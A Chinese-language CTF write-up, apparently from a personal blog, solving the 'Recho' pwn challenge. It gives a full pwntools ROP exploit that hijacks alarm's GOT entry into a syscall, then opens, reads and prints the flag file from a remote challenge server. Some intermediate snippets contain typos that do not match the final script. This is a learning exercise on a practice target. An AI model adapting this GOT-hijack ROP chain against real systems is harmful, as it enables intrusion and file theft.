<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no">
<meta name="author" content="HeZhaochen">



<meta name="description" content="前言最近看啥题都感觉像是神仙打架，真心觉得想要把pwn给学好就要去把那些源码看一遍才好。感觉自己的头发都要保不住了啊啊啊啊。希望出题人轻点吧。。。">
<meta name="keywords" content="pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="攻防世界-Recho-读取flag文件">
<meta property="og:url" content="http://yoursite.com/2020/02/22/攻防世界-Recho-读取flag文件/index.html">
<meta property="og:site_name" content="good good study,day day up!">
<meta property="og:description" content="前言最近看啥题都感觉像是神仙打架，真心觉得想要把pwn给学好就要去把那些源码看一遍才好。感觉自己的头发都要保不住了啊啊啊啊。希望出题人轻点吧。。。">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://yoursite.com/img/Recho/1.jpg">
<meta property="og:image" content="http://yoursite.com/img/Recho/2.jpg">
<meta property="og:image" content="http://yoursite.com/img/Recho/3.jpg">
<meta property="og:image" content="http://yoursite.com/img/Recho/4.jpg">
<meta property="og:updated_time" content="2020-02-22T14:29:48.718Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="攻防世界-Recho-读取flag文件">
<meta name="twitter:description" content="前言最近看啥题都感觉像是神仙打架，真心觉得想要把pwn给学好就要去把那些源码看一遍才好。感觉自己的头发都要保不住了啊啊啊啊。希望出题人轻点吧。。。">
<meta name="twitter:image" content="http://yoursite.com/img/Recho/1.jpg">

<link rel="apple-touch-icon" href="/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="good good study,day day up!" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">


<link rel="stylesheet" href="/css/style.css">



<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>攻防世界-Recho-读取flag文件 | good good study,day day up!</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: false
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/avatar.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">HeZhaochen</a></h1>
        </hgroup>

        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/heap/">heap</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/how2heap/">how2heap</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn/">pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/密码学/">密码学</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" href="https://hexo.io">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://pages.github.com/">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://moxfive.xyz/">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">专注于前端</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">HeZhaochen</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/avatar.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">HeZhaochen</a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" target="_blank" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我"/>
</nav>
      <div class="body-wrap"><article id="post-攻防世界-Recho-读取flag文件" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2020/02/22/攻防世界-Recho-读取flag文件/" class="article-date">
      <time datetime="2020-02-22T13:47:38.000Z" itemprop="datePublished">2020-02-22</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      攻防世界-Recho-读取flag文件
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/">pwn</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>最近看啥题都感觉像是神仙打架，真心觉得想要把pwn给学好就要去把那些源码看一遍才好。感觉自己的头发都要保不住了啊啊啊啊。<br>希望出题人轻点吧。。。</p>
<a id="more"></a>

<h2 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h2><p><img src="/img/Recho/1.jpg" alt="avatar"><br>保护几乎都没有开，一开始以为是一个良好的开始，后面才知道自己想的太简单了。</p>
<p><img src="/img/Recho/2.jpg" alt="avatar"></p>
<p>程序的逻辑确实是十分简单，一开始也以为是可以直接通过ROP来解决的，但是发现程序是一只处在循环中的。<br>后来看了大佬的WP才知道pwntools还有shutdown这个函数可以强行停止循环，但这样的话程序也不会再进行第二次运行了。因此直接<br>进行泄漏函数地址这样的操作就是行不通的了。但是我们看到程序中给了我们flag这个字符串，这里有学到了一种新思路，那就是利用<br>syscall来调用open函数，然后将flag给读到我们的bss段中，最后在使用printf函数给打印出来。这个操作真的是骚到我了。</p>
<p>下面来看一下如何进行具体操作的吧</p>
<h2 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h2><p>有了上述的思路之后，我们首先要解决的就是syscall的问题<br><img src="/img/Recho/3.jpg" alt="avatar"></p>
<p>这里我们跟踪一下alarm函数发现在这个函数got表偏移为5的地方就是syscall了，这就是我们所需要程序执行的地方</p>
<p>因此下面我们所需要做的就是如何来修改alarm_got使得运行alarm函数的时候执行syscall。这就要用到下面的一个gadgets<br><img src="/img/Recho/4.jpg" alt="avatar"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">add byte ptr [rdi],al;ret</span><br></pre></td></tr></table></figure>

<p>这一个gasgets可以让rdi内指向的地址加上al的值，这样到时候我们就可以劫持其GOT表了</p>
<p>下面我们先进行第一步操作</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">payload = &apos;a&apos;*0x38</span><br><span class="line">payload += p64(rdi)+p64(alarm_got)</span><br><span class="line">payload += p64(rax)+p64(0x5)</span><br><span class="line">payload += p64(add_rdi_al)</span><br></pre></td></tr></table></figure>

<p>这样我们就成功劫持了alarm函数的got表到syscall上</p>
<p>第二步就是要使用syscall来调用open<br>这里学习后发现open函数的系统调用是2，所以下面一步也就显而易见了，就是构造int fd = open(“flag”,READONLY);  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">payload += p64(rsi)+p64(0)+p64(0)</span><br><span class="line">payload += p64(rdi)+p64(e.search(&apos;flag&apos;).next())</span><br><span class="line">payload += p64(rdi)+p64(2)</span><br><span class="line">payload += p64(alarm_plt)</span><br></pre></td></tr></table></figure>

<p>由于open之后，fd一般都是从3开始的，我们之后要构造出read(fd,buf,100)来吧flag给读到bss段</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">payload += p64(rsi)+64(bss)+p64(0)</span><br><span class="line">payload += p64(rdi)+p64(3)</span><br><span class="line">payload += p64(rdx)+p64(100)</span><br><span class="line">payload += p64(read_plt)</span><br></pre></td></tr></table></figure>

<p>最后就是打印flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload += p64(rdi)+p64(bss)+p64(printf_plt)</span><br><span class="line">paylaod = payload.ljust(0x200,&apos;\x00)</span><br></pre></td></tr></table></figure>

<p>然后结束循环进行ROP就能得到flag了</p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">import time</span><br><span class="line">context.log_level = &apos;debug&apos;</span><br><span class="line">#p = process(&apos;./pwn&apos;)</span><br><span class="line">p = remote(&apos;111.198.29.45&apos;,57350)</span><br><span class="line">e = ELF(&apos;./pwn&apos;)</span><br><span class="line">rdi = 0x4008a3</span><br><span class="line">rsi = 0x4008a1</span><br><span class="line">rdx = 0x4006fe</span><br><span class="line">rax = 0x4006fc</span><br><span class="line">add_rdi_al = 0x40070d</span><br><span class="line">flag = 0x601058</span><br><span class="line">bss = 0x601070</span><br><span class="line">printf_plt = e.plt[&apos;printf&apos;]</span><br><span class="line">read_plt = e.plt[&apos;read&apos;]</span><br><span class="line">alarm_plt = e.plt[&apos;alarm&apos;]</span><br><span class="line">alarm_got = e.got[&apos;alarm&apos;]</span><br><span class="line">read_got = e.got[&apos;read&apos;]</span><br><span class="line">write_plt = e.plt[&apos;write&apos;]</span><br><span class="line">p.recv()</span><br><span class="line">p.sendline(str(0x200))</span><br><span class="line">#---------------------------edit alarm_got to get syscall-----------</span><br><span class="line">payload = &apos;a&apos;*0x38+p64(rdi)+p64(alarm_got)</span><br><span class="line">payload += p64(rax)+p64(0x5)</span><br><span class="line">payload += p64(add_rdi_al)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">#--------------------------use syscall to open flag----------------</span><br><span class="line">payload += p64(rsi)+p64(0)+p64(0)</span><br><span class="line">payload += p64(rdi)+p64(e.search(&apos;flag&apos;).next())</span><br><span class="line">payload += p64(rax)+p64(2)</span><br><span class="line">payload += p64(alarm_plt)</span><br><span class="line"></span><br><span class="line">#---------------------------read flag to bss-------------</span><br><span class="line">payload += p64(rsi)+p64(bss)+p64(0)</span><br><span class="line">payload += p64(rdi)+p64(3)</span><br><span class="line">payload += p64(rdx)+p64(100)</span><br><span class="line">payload += p64(read_plt)</span><br><span class="line"></span><br><span class="line">#----------------------------print flag--------------------------</span><br><span class="line">payload += p64(rdi)+p64(bss)+p64(printf_plt)</span><br><span class="line">print len(payload)</span><br><span class="line">payload = payload.ljust(0x200,&apos;\x00&apos;)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.shutdown(&apos;write&apos;)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>这道题目的知识大部分都是新接触的，所以其中的一些知识掌握的也不是很熟练。还是要多刷题目吧，慢慢填补自己的漏洞。<br>奥利给！！</p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2020/02/22/攻防世界-Recho-读取flag文件/">攻防世界-Recho-读取flag文件</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">HeZhaochen</a></p>
        <p><span>发布时间:</span>2020-02-22, 21:47:38</p>
        <p><span>最后更新:</span>2020-02-22, 22:29:48</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2020/02/22/攻防世界-Recho-读取flag文件/" title="攻防世界-Recho-读取flag文件">http://yoursite.com/2020/02/22/攻防世界-Recho-读取flag文件/</a>
            <span class="copy-path" data-clipboard-text="原文: http://yoursite.com/2020/02/22/攻防世界-Recho-读取flag文件/　　作者: HeZhaochen" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2020/02/17/ReeHY-mian-100-Unlink/">
                    ReeHY-mian-100-Unlink
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#程序分析"><span class="toc-number">2.</span> <span class="toc-text">程序分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#思路"><span class="toc-number">3.</span> <span class="toc-text">思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exp"><span class="toc-number">4.</span> <span class="toc-text">exp</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"攻防世界-Recho-读取flag文件　| good good study,day day up!　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    




    <div class="scroll" id="post-nav-button">
        
            <a href="/" title="回到主页"><i class="fa fa-home"></i></a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2020/02/17/ReeHY-mian-100-Unlink/" title="下一篇: ReeHY-mian-100-Unlink">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/02/22/攻防世界-Recho-读取flag文件/">攻防世界-Recho-读取flag文件</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/17/ReeHY-mian-100-Unlink/">ReeHY-mian-100-Unlink</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/08/栈溢出的总结/">栈溢出的总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/05/2014-HITCON-CTF-stkof/">2014 HITCON CTF-stkof</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/01/23/攻防世界PWN之note-service2/">攻防世界PWN之note-service2</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/12/02/how2heap学习笔记-1-——fastbin-dup/">hoe2heap学习笔记(1)——fastbin_dup</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/11/20/XCTF-format2-整数溢出/">XCTF-format2-整数溢出</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/11/18/mma-ctf-2nd-2016-greeting-150/">mma-ctf-2nd-2016-greeting-150</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/17/MCTF初赛WP-1/">MCTF初赛WP(1)</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/10/初次学习RSA密码/">初次学习RSA密码</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/31/use-after-free的学习/">use after free的学习</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/27/使用LibcSearcher解题/">使用LibcSearcher解题</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/21/heap-1/">heap-1</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2019-2020 HeZhaochen
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="快速、简洁且高效的博客框架">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="简而不减 Hexo 双栏博客主题  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="本站到访数"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 2;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>